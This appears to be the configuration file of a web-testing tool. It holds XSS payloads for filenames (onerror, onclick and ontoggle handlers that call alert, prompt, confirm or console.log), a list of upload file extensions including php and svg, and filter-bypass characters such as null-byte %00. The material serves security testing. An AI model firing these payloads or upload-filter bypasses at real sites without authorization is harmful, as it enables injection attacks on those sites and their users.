;IΛMGӨÐ

[PayloadDirectory]
DirectoryName = [
  '_XSSName',
  '_FileTypeBypass',
  ]


[_XSSName]
payload = [
  '<h1>',
  '<button onclick=prompt(0)>',
  '"><button onclick=prompt`0`>',
  '"><button onclick= prompt`0`>',
  '<img src=x onerror=prompt(0)>',
  '"><img src=x onerror=prompt`0`>',
  '"><img src=x onerror= prompt`0`>',
  '<details open ontoggle=prompt`0`>',
  '"><details open ontoggle=prompt`0`>',
  '"><details open ontoggle= prompt`0`>',
  '"onmouseover="prompt`0`',
  '"onclick="prompt`0`',
  '<button onclick=alert(0)>',
  '"><button onclick=alert`0`>',
  '"><button onclick= alert`0`>',
  '<img src=x onerror=alert(0)>',
  '"><img src=x onerror=alert`0`>',
  '"><img src=x onerror= alert`0`>',
  '<details open ontoggle=alert`0`>',
  '"><details open ontoggle=alert`0`>',
  '"><details open ontoggle= alert`0`>',
  '"onmouseover="alert`0`',
  '"onclick="alert`0`',
  '<button onclick=confirm(0)>',
  '"><button onclick=confirm`0`>',
  '"><button onclick= confirm`0`>',
  '<img src=x onerror=confirm(0)>',
  '"><img src=x onerror=confirm`0`>',
  '"><img src=x onerror= confirm`0`>',
  '<details open ontoggle=confirm`0`>',
  '"><details open ontoggle=confirm`0`>',
  '"><details open ontoggle= confirm`0`>',
  '"onmouseover="confirm`0`',
  '"onclick="confirm`0`',
  '<button onclick=console.log(0)>',
  '"><button onclick=console.log`0`>',
  '"><button onclick= console.log`0`>',
  '<img src=x onerror=console.log(0)>',
  '"><img src=x onerror=console.log`0`>',
  '"><img src=x onerror= console.log`0`>',
  '<details open ontoggle=console.log`0`>',
  '"><details open ontoggle=console.log`0`>',
  '"><details open ontoggle= console.log`0`>',
  '"onmouseover="console.log`0`',
  '"onclick="console.log`0`',
    ]

[_FileTypeBypass]
extension = [
  'png',
  'svg',
  'jpg',
  'xml',
  'csv',
  'doc',
  'docx',
  'txt',
  'pdf',
  'html',
  'php',
  'js',
  ]

; To Use % you must have a % in front of it ie: %%00
; Currently ":" Does Not Work For Some Reason OSX Replaces the ":" with a "/"
[FileBypassChars]
extension = [
  '.',
  ' .',
  ';',
  ' ;',
;  ':',
;  ' :',
  '%%00',
  '%%0D',
  ]
